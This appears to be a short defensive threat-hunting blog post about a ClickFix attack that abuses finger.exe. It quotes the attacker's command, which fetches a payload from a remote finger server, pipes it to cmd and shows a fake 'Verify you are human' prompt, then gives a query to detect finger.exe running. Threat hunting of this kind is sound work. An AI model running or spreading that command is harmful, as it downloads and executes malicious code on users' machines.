320. Adversaries Abuse Finger in ClickFix Attacks

Hello everyone!

Reading the news, I spotted another interesting variant of ClickFix attack, so let's look at available hunting opportunities.

According to the post, the adversary used the Finger executable to download a payload from a remote server and execute it via cmd, for example:

"cmd /c start "" /min cmd /c "finger vke@finger.cloudmega[.]org | cmd" && echo' Verify you are human--press ENTER'"

It's not the first time threat actors use this executable, but as it's not commonly used in modern environments, finger.exe execution may be a suspicious behavior marker itself:

event_type: "processcreatewin"

AND

proc_file_path: "finger.exe"

See you tomorrow!

Comments

Popular posts from this blog

391. Hunting for TeamPCP's Stealer

343. Ransomware Gangs Abuse SystemSettingsAdminFlows to Evade Defenses

324. Adversaries Use HideMouse to Hide Evidence of Remote Access